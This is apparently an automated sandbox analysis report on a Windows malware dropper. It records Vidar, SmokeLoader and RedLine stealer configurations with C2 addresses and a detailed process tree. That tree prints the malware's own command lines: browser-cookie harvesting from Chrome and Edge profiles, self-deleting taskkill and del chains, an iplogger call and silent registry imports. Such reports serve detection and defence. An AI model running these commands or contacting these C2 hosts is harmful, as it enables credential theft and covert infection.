Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    1801s
  • max time network
    1815s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    20-07-2021 12:41

General

  • Target

    8 (11).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

AniNEW

C2

akedauiver.xyz:80

Extracted

Family

redline

Botnet

sel17

C2

dwarimlari.xyz:80

Extracted

Family

vidar

Version

39.7

Botnet

921

C2

https://shpak125.tumblr.com/

Attributes
  • profile_id

    921

Extracted

Family

vidar

Version

39.6

Botnet

903

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    903

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 7 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • redlinestealer 6 IoCs

    RedlineStealer.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 6 IoCs
  • ASPack v2.12-2.42 8 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 1 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 20 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 10 IoCs
  • Drops file in Program Files directory 7 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 21 IoCs
  • Checks SCSI registry key(s) 3 TTPs 9 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 12 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 4 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs .reg file with regedit 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Browser
    1⤵
      PID:2752
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2384
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2360
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
        1⤵
          PID:2332
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2272
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1892
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1356
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1288
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1196
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                    • Modifies registry class
                    PID:1084
                  • C:\Users\Admin\AppData\Local\Temp\8 (11).exe
                    "C:\Users\Admin\AppData\Local\Temp\8 (11).exe"
                    1⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4068
                    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of WriteProcessMemory
                      PID:2284
                      • C:\Users\Admin\AppData\Local\Temp\7zSCE884164\setup_install.exe
                        "C:\Users\Admin\AppData\Local\Temp\7zSCE884164\setup_install.exe"
                        3⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of WriteProcessMemory
                        PID:2880
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c sonia_2.exe
                          4⤵
                          • Suspicious use of WriteProcessMemory
                          PID:988
                          • C:\Users\Admin\AppData\Local\Temp\7zSCE884164\sonia_2.exe
                            sonia_2.exe
                            5⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Checks SCSI registry key(s)
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious behavior: MapViewOfSection
                            PID:2020
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c sonia_3.exe
                          4⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3004
                          • C:\Users\Admin\AppData\Local\Temp\7zSCE884164\sonia_3.exe
                            sonia_3.exe
                            5⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Checks processor information in registry
                            • Modifies system certificate store
                            PID:1212
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c taskkill /im sonia_3.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zSCE884164\sonia_3.exe" & del C:\ProgramData\*.dll & exit
                              6⤵
                                PID:4832
                                • C:\Windows\SysWOW64\taskkill.exe
                                  taskkill /im sonia_3.exe /f
                                  7⤵
                                  • Kills process with taskkill
                                  PID:2292
                                • C:\Windows\SysWOW64\timeout.exe
                                  timeout /t 6
                                  7⤵
                                  • Delays execution with timeout.exe
                                  PID:4920
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c sonia_5.exe
                            4⤵
                            • Suspicious use of WriteProcessMemory
                            PID:3084
                            • C:\Users\Admin\AppData\Local\Temp\7zSCE884164\sonia_5.exe
                              sonia_5.exe
                              5⤵
                              • Executes dropped EXE
                              • Checks computer location settings
                              PID:3712
                              • C:\Users\Admin\Documents\0QFeP6Vnyyzrt1sme6frDfWL.exe
                                "C:\Users\Admin\Documents\0QFeP6Vnyyzrt1sme6frDfWL.exe"
                                6⤵
                                • Executes dropped EXE
                                PID:5104
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp
                                  7⤵
                                    PID:4164
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd
                                      8⤵
                                        PID:4368
                                        • C:\Windows\SysWOW64\findstr.exe
                                          findstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp
                                          9⤵
                                            PID:5936
                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                            Acre.exe.com k
                                            9⤵
                                            • Executes dropped EXE
                                            PID:5484
                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                              10⤵
                                              • Executes dropped EXE
                                              PID:5580
                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                11⤵
                                                • Executes dropped EXE
                                                PID:6112
                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                  12⤵
                                                  • Executes dropped EXE
                                                  • Drops startup file
                                                  • Suspicious use of SetThreadContext
                                                  • Suspicious behavior: MapViewOfSection
                                                  PID:5020
                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                    13⤵
                                                      PID:4284
                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                      13⤵
                                                        PID:5112
                                              • C:\Windows\SysWOW64\PING.EXE
                                                ping 127.0.0.1 -n 30
                                                9⤵
                                                • Runs ping.exe
                                                PID:5732
                                        • C:\Users\Admin\Documents\WH8ukLAF42L2AbaGg3hgflem.exe
                                          "C:\Users\Admin\Documents\WH8ukLAF42L2AbaGg3hgflem.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          • Suspicious use of AdjustPrivilegeToken
                                          • Suspicious use of WriteProcessMemory
                                          PID:1092
                                          • C:\Users\Admin\Documents\WH8ukLAF42L2AbaGg3hgflem.exe
                                            C:\Users\Admin\Documents\WH8ukLAF42L2AbaGg3hgflem.exe
                                            7⤵
                                              PID:4596
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /c taskkill /im WH8ukLAF42L2AbaGg3hgflem.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\WH8ukLAF42L2AbaGg3hgflem.exe" & del C:\ProgramData\*.dll & exit
                                                8⤵
                                                  PID:5296
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /im WH8ukLAF42L2AbaGg3hgflem.exe /f
                                                    9⤵
                                                    • Kills process with taskkill
                                                    PID:5744
                                                  • C:\Windows\SysWOW64\timeout.exe
                                                    timeout /t 6
                                                    9⤵
                                                    • Delays execution with timeout.exe
                                                    PID:3160
                                              • C:\Users\Admin\Documents\WH8ukLAF42L2AbaGg3hgflem.exe
                                                C:\Users\Admin\Documents\WH8ukLAF42L2AbaGg3hgflem.exe
                                                7⤵
                                                  PID:2060
                                              • C:\Users\Admin\Documents\yRh6TwFtJG0gSFHABPuSAnXt.exe
                                                "C:\Users\Admin\Documents\yRh6TwFtJG0gSFHABPuSAnXt.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Suspicious use of SetThreadContext
                                                PID:4160
                                                • C:\Users\Admin\Documents\yRh6TwFtJG0gSFHABPuSAnXt.exe
                                                  C:\Users\Admin\Documents\yRh6TwFtJG0gSFHABPuSAnXt.exe
                                                  7⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Checks processor information in registry
                                                  PID:640
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im yRh6TwFtJG0gSFHABPuSAnXt.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\yRh6TwFtJG0gSFHABPuSAnXt.exe" & del C:\ProgramData\*.dll & exit
                                                    8⤵
                                                      PID:5112
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im yRh6TwFtJG0gSFHABPuSAnXt.exe /f
                                                        9⤵
                                                        • Kills process with taskkill
                                                        PID:5440
                                                      • C:\Windows\SysWOW64\timeout.exe
                                                        timeout /t 6
                                                        9⤵
                                                        • Delays execution with timeout.exe
                                                        PID:6084
                                                • C:\Users\Admin\Documents\AtI8fgBY2WX7aCkXOsl4RsYT.exe
                                                  "C:\Users\Admin\Documents\AtI8fgBY2WX7aCkXOsl4RsYT.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  PID:4224
                                                • C:\Users\Admin\Documents\PR41XDiyWNBOgnKUrLBD_cD2.exe
                                                  "C:\Users\Admin\Documents\PR41XDiyWNBOgnKUrLBD_cD2.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetThreadContext
                                                  PID:4584
                                                  • C:\Users\Admin\Documents\PR41XDiyWNBOgnKUrLBD_cD2.exe
                                                    C:\Users\Admin\Documents\PR41XDiyWNBOgnKUrLBD_cD2.exe
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:2508
                                                • C:\Users\Admin\Documents\As33nYs7yzN156AW5JiBjVHh.exe
                                                  "C:\Users\Admin\Documents\As33nYs7yzN156AW5JiBjVHh.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Checks BIOS information in registry
                                                  • Checks whether UAC is enabled
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  PID:1824
                                                  • C:\Users\Admin\AppData\Roaming\1234.exe
                                                    C:\Users\Admin\AppData\Roaming\1234.exe 1234
                                                    7⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of SetThreadContext
                                                    PID:5840
                                                    • C:\Users\Admin\AppData\Roaming\1234.exe
                                                      "{path}"
                                                      8⤵
                                                        PID:5316
                                                  • C:\Users\Admin\Documents\g3UBHnETwbdI6U64u_tZ21NM.exe
                                                    "C:\Users\Admin\Documents\g3UBHnETwbdI6U64u_tZ21NM.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • Drops file in Program Files directory
                                                    PID:4688
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\EverestSoftrade\TonerRecover\log.bat" "
                                                      7⤵
                                                        PID:4176
                                                        • C:\Windows\SysWOW64\explorer.exe
                                                          explorer https://iplogger.org/2LBCU6
                                                          8⤵
                                                          • Executes dropped EXE
                                                          PID:3560
                                                        • C:\Windows\SysWOW64\regedit.exe
                                                          regedit /s adj.reg
                                                          8⤵
                                                          • Runs .reg file with regedit
                                                          PID:4760
                                                        • C:\Windows\SysWOW64\regedit.exe
                                                          regedit /s adj2.reg
                                                          8⤵
                                                          • Runs .reg file with regedit
                                                          PID:4604
                                                      • C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe
                                                        "C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:4476
                                                    • C:\Users\Admin\Documents\jbaaztWqvn3KUstKJdcgLSGu.exe
                                                      "C:\Users\Admin\Documents\jbaaztWqvn3KUstKJdcgLSGu.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetThreadContext
                                                      PID:4388
                                                      • C:\Users\Admin\Documents\jbaaztWqvn3KUstKJdcgLSGu.exe
                                                        C:\Users\Admin\Documents\jbaaztWqvn3KUstKJdcgLSGu.exe
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:4236
                                                    • C:\Users\Admin\Documents\4VPeqDStSBEtNpuYcgCY9oxu.exe
                                                      "C:\Users\Admin\Documents\4VPeqDStSBEtNpuYcgCY9oxu.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Checks whether UAC is enabled
                                                      PID:1080
                                                    • C:\Users\Admin\Documents\3ksknZTfWSKXtgTO9TwscXBw.exe
                                                      "C:\Users\Admin\Documents\3ksknZTfWSKXtgTO9TwscXBw.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetThreadContext
                                                      PID:4404
                                                      • C:\Users\Admin\Documents\3ksknZTfWSKXtgTO9TwscXBw.exe
                                                        C:\Users\Admin\Documents\3ksknZTfWSKXtgTO9TwscXBw.exe
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:1116
                                                    • C:\Users\Admin\Documents\j0Km2SSknnBJoV3uaMDJyECH.exe
                                                      "C:\Users\Admin\Documents\j0Km2SSknnBJoV3uaMDJyECH.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      PID:2084
                                                      • C:\Users\Admin\Documents\j0Km2SSknnBJoV3uaMDJyECH.exe
                                                        "C:\Users\Admin\Documents\j0Km2SSknnBJoV3uaMDJyECH.exe"
                                                        7⤵
                                                        • Modifies data under HKEY_USERS
                                                        PID:5384
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5384 -s 1296
                                                          8⤵
                                                          • Program crash
                                                          PID:5768
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 860
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • Program crash
                                                        PID:2060
                                                    • C:\Users\Admin\Documents\mMgbj8F5ZiGdXNRZ_A2wWRu2.exe
                                                      "C:\Users\Admin\Documents\mMgbj8F5ZiGdXNRZ_A2wWRu2.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      PID:4108
                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:6092
                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:5668
                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:5256
                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:2376
                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        7⤵
                                                          PID:5364
                                                        • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                          7⤵
                                                            PID:5444
                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            7⤵
                                                              PID:4508
                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                              7⤵
                                                                PID:5868
                                                            • C:\Users\Admin\Documents\VSDY1wy4OHKvtq8DFaKl1Oay.exe
                                                              "C:\Users\Admin\Documents\VSDY1wy4OHKvtq8DFaKl1Oay.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Checks BIOS information in registry
                                                              • Checks whether UAC is enabled
                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                              PID:4824
                                                            • C:\Users\Admin\Documents\FiGrHPWKE16KzUjJMLjAazX9.exe
                                                              "C:\Users\Admin\Documents\FiGrHPWKE16KzUjJMLjAazX9.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              PID:4832
                                                              • C:\Users\Admin\Documents\FiGrHPWKE16KzUjJMLjAazX9.exe
                                                                "C:\Users\Admin\Documents\FiGrHPWKE16KzUjJMLjAazX9.exe" -a
                                                                7⤵
                                                                • Executes dropped EXE
                                                                PID:4700
                                                            • C:\Users\Admin\Documents\VeoRKzJ0Bd26nZmCvS91BUIh.exe
                                                              "C:\Users\Admin\Documents\VeoRKzJ0Bd26nZmCvS91BUIh.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • Checks processor information in registry
                                                              PID:2284
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im VeoRKzJ0Bd26nZmCvS91BUIh.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\VeoRKzJ0Bd26nZmCvS91BUIh.exe" & del C:\ProgramData\*.dll & exit
                                                                7⤵
                                                                  PID:5384
                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                    taskkill /im VeoRKzJ0Bd26nZmCvS91BUIh.exe /f
                                                                    8⤵
                                                                    • Kills process with taskkill
                                                                    PID:5796
                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                    timeout /t 6
                                                                    8⤵
                                                                    • Delays execution with timeout.exe
                                                                    PID:5376
                                                              • C:\Users\Admin\Documents\nbo2_pcWQARV6sCWnl0oLEO4.exe
                                                                "C:\Users\Admin\Documents\nbo2_pcWQARV6sCWnl0oLEO4.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                PID:4876
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 660
                                                                  7⤵
                                                                  • Program crash
                                                                  PID:4276
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 676
                                                                  7⤵
                                                                  • Program crash
                                                                  PID:4136
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 680
                                                                  7⤵
                                                                  • Program crash
                                                                  PID:4828
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 692
                                                                  7⤵
                                                                  • Program crash
                                                                  PID:2288
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 1016
                                                                  7⤵
                                                                  • Program crash
                                                                  PID:4664
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 1208
                                                                  7⤵
                                                                  • Program crash
                                                                  PID:5436
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 1248
                                                                  7⤵
                                                                  • Program crash
                                                                  PID:5948
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 2020
                                                                  7⤵
                                                                  • Program crash
                                                                  PID:3084
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 1856
                                                                  7⤵
                                                                  • Program crash
                                                                  PID:4960
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 2044
                                                                  7⤵
                                                                  • Program crash
                                                                  PID:1864
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 1412
                                                                  7⤵
                                                                  • Program crash
                                                                  PID:5356
                                                              • C:\Users\Admin\Documents\h7BL00hyeY6OMBYiPZUTCnfF.exe
                                                                "C:\Users\Admin\Documents\h7BL00hyeY6OMBYiPZUTCnfF.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of SetThreadContext
                                                                PID:2580
                                                                • C:\Users\Admin\Documents\h7BL00hyeY6OMBYiPZUTCnfF.exe
                                                                  "C:\Users\Admin\Documents\h7BL00hyeY6OMBYiPZUTCnfF.exe"
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  • Checks processor information in registry
                                                                  PID:1492
                                                              • C:\Users\Admin\Documents\0NTxuKQ87WcyDG1v5ZsL1Xol.exe
                                                                "C:\Users\Admin\Documents\0NTxuKQ87WcyDG1v5ZsL1Xol.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                PID:4068
                                                                • C:\Users\Admin\AppData\Roaming\1094820.exe
                                                                  "C:\Users\Admin\AppData\Roaming\1094820.exe"
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  PID:5492
                                                                • C:\Users\Admin\AppData\Roaming\8344973.exe
                                                                  "C:\Users\Admin\AppData\Roaming\8344973.exe"
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  PID:5696
                                                              • C:\Users\Admin\Documents\HWIAzybtlReHvEv0iwMtneDH.exe
                                                                "C:\Users\Admin\Documents\HWIAzybtlReHvEv0iwMtneDH.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                PID:4980
                                                                • C:\Users\Admin\AppData\Roaming\5108028.exe
                                                                  "C:\Users\Admin\AppData\Roaming\5108028.exe"
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  PID:5504
                                                                • C:\Users\Admin\AppData\Roaming\6643716.exe
                                                                  "C:\Users\Admin\AppData\Roaming\6643716.exe"
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  PID:5616
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                            4⤵
                                                              PID:2128
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                              4⤵
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:2960
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c sonia_4.exe
                                                              4⤵
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:1300
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c sonia_1.exe
                                                              4⤵
                                                                PID:3896
                                                        • c:\windows\system32\svchost.exe
                                                          c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                          1⤵
                                                          • Drops file in System32 directory
                                                          PID:932
                                                          • C:\Users\Admin\AppData\Roaming\grdajsb
                                                            C:\Users\Admin\AppData\Roaming\grdajsb
                                                            2⤵
                                                            • Loads dropped DLL
                                                            • Checks SCSI registry key(s)
                                                            • Suspicious behavior: MapViewOfSection
                                                            PID:4400
                                                          • C:\Users\Admin\AppData\Roaming\grdajsb
                                                            C:\Users\Admin\AppData\Roaming\grdajsb
                                                            2⤵
                                                            • Loads dropped DLL
                                                            • Checks SCSI registry key(s)
                                                            • Suspicious behavior: MapViewOfSection
